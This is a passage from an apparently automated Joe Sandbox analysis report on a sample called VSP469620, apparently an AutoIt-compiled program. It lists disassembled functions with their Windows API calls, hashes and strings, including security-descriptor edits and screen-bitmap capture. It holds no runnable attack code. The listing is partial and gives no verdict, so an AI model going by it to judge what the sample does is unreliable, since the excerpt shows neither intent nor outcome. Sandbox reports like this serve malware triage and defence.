                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: ec33fc993afc5839b948126c3c9190f0dda52a0766dafa7501bfef291b0af4de
                                                              • Instruction ID: 37c31c0e5f1f6008fe2fc5e16e7de3de7e3578167a985c8e3620db63a4103bb7
                                                              • Opcode Fuzzy Hash: ec33fc993afc5839b948126c3c9190f0dda52a0766dafa7501bfef291b0af4de
                                                              • Instruction Fuzzy Hash: C43181B2500109ABDB21DFA4DC49FEF77BDEF89740F2041B6F60AD2160EB7096458B24
                                                              Function 00B1E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B1BEF4,?,?), ref: 00B1E754
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E76B
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E776
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E783
                                                              • GlobalLock.KERNEL32(00000000), ref: 00B1E78C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E79B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00B1E7A4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E7AB
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E7BC
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3D9BC,?), ref: 00B1E7D5
                                                              • GlobalFree.KERNEL32(00000000), ref: 00B1E7E5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B1E809
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B1E834
                                                              • DeleteObject.GDI32(00000000), ref: 00B1E85C
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B1E872
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 3c82fd2f1751c75869e867fce1643ebd35c4d584b9666809e4db413c85f1ffae
                                                              • Instruction ID: 93b7b753d0088a568867673d1799e7556b93f07cd6fbd14c855f8a54648e1624
                                                              • Opcode Fuzzy Hash: 3c82fd2f1751c75869e867fce1643ebd35c4d584b9666809e4db413c85f1ffae
                                                              • Instruction Fuzzy Hash: 39412975600204AFDB119F65EC88EAE7BB8EB89711F204058F916A72A0DB309D41DB20
                                                              Function 00B005F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 00B0076F
                                                              • _wcscat.LIBCMT ref: 00B00787
                                                              • _wcscat.LIBCMT ref: 00B00799
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B007AE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B007C2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00B007DA
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B007F4
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: fc9967d1a7783baaa6ee2bf03e96ddb09eed4d6c72a4619aaddb6375e4e4abda
                                                              • Instruction ID: c1c1d1195d88ca93971ce5823adab4fd8cc2a670dae431031dfd604f52506510
                                                              • Opcode Fuzzy Hash: fc9967d1a7783baaa6ee2bf03e96ddb09eed4d6c72a4619aaddb6375e4e4abda
                                                              • Instruction Fuzzy Hash: 8C81C4715143419FCB24EF24C584AAEBBE9FBD4300F14886EF486C7291EB35DD448B52
                                                              Function 00B1EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B1EF3B
                                                              • GetFocus.USER32 ref: 00B1EF4B
                                                              • GetDlgCtrlID.USER32(00000000), ref: 00B1EF56
                                                              • _memset.LIBCMT ref: 00B1F081
                                                              • GetMenuItemInfoW.USER32 ref: 00B1F0AC
                                                              • GetMenuItemCount.USER32(00000000), ref: 00B1F0CC
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00B1F0DF
                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00B1F113
                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00B1F15B
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B1F193
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B1F1C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: b98d51718675a9259eccbf02860ec1fd105c39a1458983b9b06997e42254b9eb
                                                              • Instruction ID: 366972c81d4c6914fd1da07f0b31a5ef5292d40e1491560d58412929649b3a30
                                                              • Opcode Fuzzy Hash: b98d51718675a9259eccbf02860ec1fd105c39a1458983b9b06997e42254b9eb
                                                              • Instruction Fuzzy Hash: E381AF71104302AFD710CF14D885ABBBBE9FF88314F50496EF999A7291DB30D991CB62
                                                              Function 00AEA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AEABD7
                                                                • Part of subcall function 00AEABBB: GetLastError.KERNEL32(?,00AEA69F,?,?,?), ref: 00AEABE1
                                                                • Part of subcall function 00AEABBB: GetProcessHeap.KERNEL32(00000008,?,?,00AEA69F,?,?,?), ref: 00AEABF0
                                                                • Part of subcall function 00AEABBB: HeapAlloc.KERNEL32(00000000,?,00AEA69F,?,?,?), ref: 00AEABF7
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AEAC0E
                                                                • Part of subcall function 00AEAC56: GetProcessHeap.KERNEL32(00000008,00AEA6B5,00000000,00000000,?,00AEA6B5,?), ref: 00AEAC62
                                                                • Part of subcall function 00AEAC56: HeapAlloc.KERNEL32(00000000,?,00AEA6B5,?), ref: 00AEAC69
                                                                • Part of subcall function 00AEAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AEA6B5,?), ref: 00AEAC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AEA8CB
                                                              • _memset.LIBCMT ref: 00AEA8E0
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AEA8FF
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA910
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00AEA94D
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AEA969
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA986
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AEA995
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEA99C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AEA9BD
                                                              • CopySid.ADVAPI32(00000000), ref: 00AEA9C4
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AEA9F5
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AEAA1B
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AEAA2F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: c62f17a54ce9f114d68cb040b1d8bd36e4579b05d02eff489e43ba9378052223
                                                              • Instruction ID: e8a9786dc93e92f1cb1c4e761a81d8c3719856cd006eae119b8dd4de0f3a37cc
                                                              • Opcode Fuzzy Hash: c62f17a54ce9f114d68cb040b1d8bd36e4579b05d02eff489e43ba9378052223
                                                              • Instruction Fuzzy Hash: B3517071900249AFDF14DFA6DD95EEEBB7AFF14300F148129F911AB290DB34AA05CB61
                                                              Function 00B09DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00B09E36
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B09E42
                                                              • CreateCompatibleDC.GDI32(?), ref: 00B09E4E
                                                              • SelectObject.GDI32(00000000,?), ref: 00B09E5B
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B09EAF
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00B09EEB
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B09F0F
                                                              • SelectObject.GDI32(00000006,?), ref: 00B09F17
                                                              • DeleteObject.GDI32(?), ref: 00B09F20
                                                              • DeleteDC.GDI32(00000006), ref: 00B09F27
                                                              • ReleaseDC.USER32(00000000,?), ref: 00B09F32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 9709e40b8fa1c25406a6dc93c1252ae87518b48a136ad44663dbcf3daa2bf6a5
                                                              • Instruction ID: aee5d6d2eb8554c0456d7bd139f8e4dd663fe0a4e69b6ce8339b9ac46cf8bc9c
                                                              • Opcode Fuzzy Hash: 9709e40b8fa1c25406a6dc93c1252ae87518b48a136ad44663dbcf3daa2bf6a5
                                                              • Instruction Fuzzy Hash: D9513875900309AFCB14CFA8DC85EAEBBB9EF48710F14895DF959A7250CB31A941CB90
                                                              Function 00AFCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-2391861430
                                                              • Opcode ID: 1c1f83638b40a95e9976cc2253cec0bfe6727f6b3e6ab3b104f248e86696cc90
                                                              • Instruction ID: 267209cdcf27fdc8f47657000cfdee9450a664635c7135286f6e2947dda3973a
                                                              • Opcode Fuzzy Hash: 1c1f83638b40a95e9976cc2253cec0bfe6727f6b3e6ab3b104f248e86696cc90
                                                              • Instruction Fuzzy Hash: C6516A3180010DBADB15EBE4DE42EEEBBB9EF08350F104166F505721A2EB356F99DB60
                                                              Function 00AFCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-3420473620
                                                              • Opcode ID: fd598c719f2a3409482ef604b367a89ba0a99b591f17457a6b2ee8c579cb5ec5
                                                              • Instruction ID: 5822a0325ffcd1da0b4df4bfeabcf287c63688b46248250dab421a0bc867a039
                                                              • Opcode Fuzzy Hash: fd598c719f2a3409482ef604b367a89ba0a99b591f17457a6b2ee8c579cb5ec5
                                                              • Instruction Fuzzy Hash: 00516A31900209AADB15EBE4DE42EEEB7B8EF04350F104166F506731A2EA356F99DF61
                                                              Function 00AF55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF55D7
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00AF5664
                                                              • GetMenuItemCount.USER32(00B71708), ref: 00AF56ED
                                                              • DeleteMenu.USER32(00B71708,00000005,00000000,000000F5,?,?), ref: 00AF577D
                                                              • DeleteMenu.USER32(00B71708,00000004,00000000), ref: 00AF5785
                                                              • DeleteMenu.USER32(00B71708,00000006,00000000), ref: 00AF578D
                                                              • DeleteMenu.USER32(00B71708,00000003,00000000), ref: 00AF5795
                                                              • GetMenuItemCount.USER32(00B71708), ref: 00AF579D
                                                              • SetMenuItemInfoW.USER32(00B71708,00000004,00000000,00000030), ref: 00AF57D3
                                                              • GetCursorPos.USER32(?), ref: 00AF57DD
                                                              • SetForegroundWindow.USER32(00000000), ref: 00AF57E6
                                                              • TrackPopupMenuEx.USER32(00B71708,00000000,?,00000000,00000000,00000000), ref: 00AF57F9
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AF5805
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: 03deaf94c789c38460789debdb28f23441d15ff72e4d858049cbf85a6868b771
                                                              • Instruction ID: 5f26b1e48a5c549223d5f95b1a3fc7331728077fe2553228e180fb927d8904a3
                                                              • Opcode Fuzzy Hash: 03deaf94c789c38460789debdb28f23441d15ff72e4d858049cbf85a6868b771
                                                              • Instruction Fuzzy Hash: DE71C470A40A0DBEEB219BA4DC49FBABF65FF04364F284205F725AA1E1CB715850DB94
                                                              Function 00B13C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: f7e69f5292547c1eb2d4bc9e4a4b8b64193a9302c8f0e76f3681c3025d6ca9b7
                                                              • Instruction ID: 2f868c65385d80596e56e58235022393b40ed4c5df5fad5fc9def38b127839a1
                                                              • Opcode Fuzzy Hash: f7e69f5292547c1eb2d4bc9e4a4b8b64193a9302c8f0e76f3681c3025d6ca9b7
                                                              • Instruction Fuzzy Hash: 3841603111424A8BDF00EF10E991AEB37E5FF62700F9144A8EC561B292FB74DE9ACB50
                                                              Function 00AF25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B236F4,00000010,?,Bad directive syntax error,00B4DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AF25D6
                                                              • LoadStringW.USER32(00000000,?,00B236F4,00000010), ref: 00AF25DD
                                                              • _wprintf.LIBCMT ref: 00AF2610
                                                              • __swprintf.LIBCMT ref: 00AF2632
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AF26A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1080873982-4153970271
                                                              • Opcode ID: ec00ebb4c5afc8a93571e9f8e542932677012a272388a91306126a4a8a2dc75b
                                                              • Instruction ID: 115cd14b34308547bee1dd81ced08176cc8d0a22c26551fc22d5ec4d3ccac3df
                                                              • Opcode Fuzzy Hash: ec00ebb4c5afc8a93571e9f8e542932677012a272388a91306126a4a8a2dc75b
                                                              • Instruction Fuzzy Hash: B821393180021ABFCF11AB90DD4AFEE7BB9FF18704F04045AF516661A3EA75A628DB50
                                                              Function 00AF7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AF7B42
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AF7B58
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AF7B69
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AF7B7B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AF7B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: 87e5c964b073d8cef2220f86333a5b9d37dbb1203b3b77fe0ff04e06619cf81e
                                                              • Instruction ID: a61dc09519b98670ac0ec555a63f244cabd1ea2875b03912f1bc8e25f47bb6f4
                                                              • Opcode Fuzzy Hash: 87e5c964b073d8cef2220f86333a5b9d37dbb1203b3b77fe0ff04e06619cf81e
                                                              • Instruction Fuzzy Hash: 3911B2A0A4025979D720B7A5CC4ADFFBAFCEB92F10F000559B412A30D2EEA40E45C9A0
                                                              Function 00AF778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00AF7794
                                                                • Part of subcall function 00ACDC38: timeGetTime.WINMM(?,7707B400,00B258AB), ref: 00ACDC3C
                                                              • Sleep.KERNEL32(0000000A), ref: 00AF77C0
                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00AF77E4
                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AF7806
                                                              • SetActiveWindow.USER32 ref: 00AF7825
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AF7833
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AF7852
                                                              • Sleep.KERNEL32(000000FA), ref: 00AF785D
                                                              • IsWindow.USER32 ref: 00AF7869
                                                              • EndDialog.USER32(00000000), ref: 00AF787A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
